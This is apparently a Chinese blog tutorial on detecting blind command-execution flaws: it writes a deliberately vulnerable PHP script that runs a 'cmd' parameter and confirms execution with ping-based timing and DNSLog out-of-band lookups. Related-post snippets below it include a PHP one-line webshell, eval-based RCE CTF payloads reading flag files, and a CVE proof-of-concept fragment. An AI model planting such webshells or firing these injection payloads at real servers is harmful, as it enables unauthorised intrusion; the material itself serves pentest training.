命令执行漏洞无回现如何渗透

已于 2023-11-25 19:26:29 修改
阅读量192 收藏
点赞数
分类专栏: 02 文章标签: 安全 web安全
于 2023-11-21 17:23:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79328240/article/details/134536287
版权
文章探讨了如何通过PHP脚本执行命令,隐藏输出并利用网络延迟和Yakit工具(如DNSLog)来检测Web应用中的命令执行漏洞。作者展示了使用DNSLog生成域名并检查其日志记录以确认命令执行情况的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

 编写一段命令执行代码

访问代码

输入执行命令

利用控制台中网络延迟

利用yakit软件

dnslog生成可用域名

尝试ping 命令

查看dnslog软件记录

 编写一段命令执行代码

<?php
if (isset($_REQUEST["cmd"])){
    $cmd=$_REQUEST['cmd'];
    `$cmd`;
}else{
    echo"?cmd=whoami";}

?>

 # 隐藏输出回显

访问代码

输入执行命令

输入参数后,没有回显,那命令到底被执行了还是没被执行?有没有命令执行漏洞?

利用控制台中网络延迟

这种方法可以测试但是,没有很强的说服性,可能会被认为网络延迟

?cmd=ping 127.0.0.1

利用yakit软件

也可以利用网页版生成一个dns域名

http://ceye.ioicon-default.png?t=N7T8http://ceye.io/

DNSLog PlatformDNSLog平台icon-default.png?t=N7T8http://dnslog.cn/

利用yakit里面的dnslog生成个新的域名,然后利用ping命令测试,查看dnslog日志是否有记录,从而确认命令是否被执行,进一步确定是否存在漏洞

dnslog生成可用域名

尝试ping 命令

?cmd=ping qpmhnefliz.dgrh3.cn

查看dnslog软件记录

验证陈宫,有历史记录代表命令执行成功了,存在漏洞

0day 泛微E-Mobile 6.0 存在命令执行
失心少年
08-01 1144
泛微E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服务器的执行权限。
web渗透测试漏洞复现:ZooKeeper未授权漏洞复现
HACKONE的博客
03-30 1716
ZooKeeper 是一个分布式的、开源的协调服务,最初由雅虎开发,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用程序的开发和维护,它通过提供一组简单易用的原语和数据模型,为分布式系统中的进程提供协作服务。
演示命令执行漏洞回现如何渗透
weixin_58155715的博客
11-21 112
打开Yakit,点击DNSlog生成一个域名访问DVWA靶场的命令执行,使用ping命令去ping刚才生成的域名最后查看Yakit的DNSlog有回显证明此处存在命令执行漏洞
在无回显的情况下如何判断是否存在命令注入漏洞
一个努力学习网安的小牛马
11-21 230
这种情况下可以使用OOB带外来实现,言而简之,就是利用命令执行漏洞去解析我们的dns如果dns日志有记录那就说明存在命令注入漏洞。可以看到dns日志有解析记录说明存在命令注入漏洞。在再次测试使用ping命令ping该dns。首先先简单搭建一个无回显的命令注入。在dnslog上生成一个dns。构造好之后测试发现并无回显。
cctfhub---rce-eval文件执行
x2813488062的博客
02-24 3895
eval详解 命令详解 一.eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 代码中用cmd来接收传入数据 可以将代码传递给cmd来执行 /?cmd=system("pwd") system()函数的作用为执行系统命令并输出执行结果 执行 pwd 指令可立刻得知您目前所在的工作目录...
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 6321
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
PHP安全webshell和后门检测
weixin_30517001的博客
05-06 626
一、各种webshell 一句话木马,其形式如下所示: <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); system($cmd); echo"</pre>$cmd<pre>"; die; } ?> 这种容易被安全软件检...
day2-dvwa命令执行漏洞代码审计&PHP反序列化
m0_70099896的博客
11-21 329
php反序列化漏洞,是手工测试不出来的,只能通过代码审计漏洞原因是因为没有对用户上传的代码进行审核过滤或者魔法函数中存在危险的动作能够被用户的代码调用。
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 783
使用kali-msf6对ubuntu的php-CGI漏洞攻击
渗透测试】如何利用burpsuite测试无回显漏洞
Testfan_zhou的博客
06-20 4394
前面的文章讲了在windows和linux上的不同的无文件渗透测试的方法,那么这篇文章给大家讲解如何在漏洞没有回显的情况下,利用burpsuite自带插件进行测试的方式。 首先我们稍微提一下有哪些无回显的漏洞,一般有盲注(SQL注入的一种)、盲XXE(XML外部实体注入的一种)、命令执行、一些特殊的框架漏洞/没有回显的SSRF漏洞等,这些漏洞在正常测试时都没有回显,所以为了更为直观的测试,我们需要...
CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”
热门推荐
Ho1aAs‘s Blog
07-23 1万+
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
CTFhub技能树_Web RCE
weixin_45897324的博客
10-11 1260
一、eval执行 1.分析: 打开网站显示如下代码: <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 大体意思是:判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 eval($_REQUEST["cmd"]); 其中: eval():该函数可以把字符串作为PHP代码执行 $_REQUEST['
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 7282
CTFHub – RCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell
风洞网
10-15 1554
洞悉安全,风洞网,认准官方网站! FOFA语法:app="Aviatrix-Controller" CVE-2021-40870 漏洞利用 在 6.5-1804.1922 之前的 Aviatrix Controller 6.x 中发现了一个问题。可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。 POC def poc_attack(url): try: url = url + "/" filename = "RCE.p
web基础之RCE
最新发布
m0_74080781的博客
09-12 1700
简介:RCE称为远程代码执行漏洞;是互联网的一种安全漏洞;攻击者可以直接向后台服务器远程注入操作系统命令;从而操控后台系统;也是CTF比较常考的一个方面。
CTF RCE漏洞
nobugnomoney的博客
09-17 4678
RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 PHP 执行系统外部命令 system() exec() passthru() PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时
【CTFHub】RCE
qq_61109509的博客
02-22 681
eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 先查看下目录 /?cmd=system('ls'); 看来这一级啥都没有,那我们看看上一级文件夹 /?cmd=system('ls /'); 打开flag,注意打开的是下一级 /?cmd=system('cat /flag_30311..
linux中的链接符号
m0_55754984的博客
09-13 686
1.每个命令之间用;隔开 说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。 2.每个命令之间用&&隔开 说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。 3.每个命令之间用||隔开 说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。 4. | 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。 5. & 是后台任务符号。
ctfhub-eval执行
m0_52432374的博客
03-24 2054
ctfhub-eval执行 打开题目,发现是这个 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 然后百度eval()函数 eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是 非常危险的, 因为它允许执行任意 PHP 代码。 它这样用是很危险的。 如果您仔细的确认过,除了使用此结构以外 别无方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值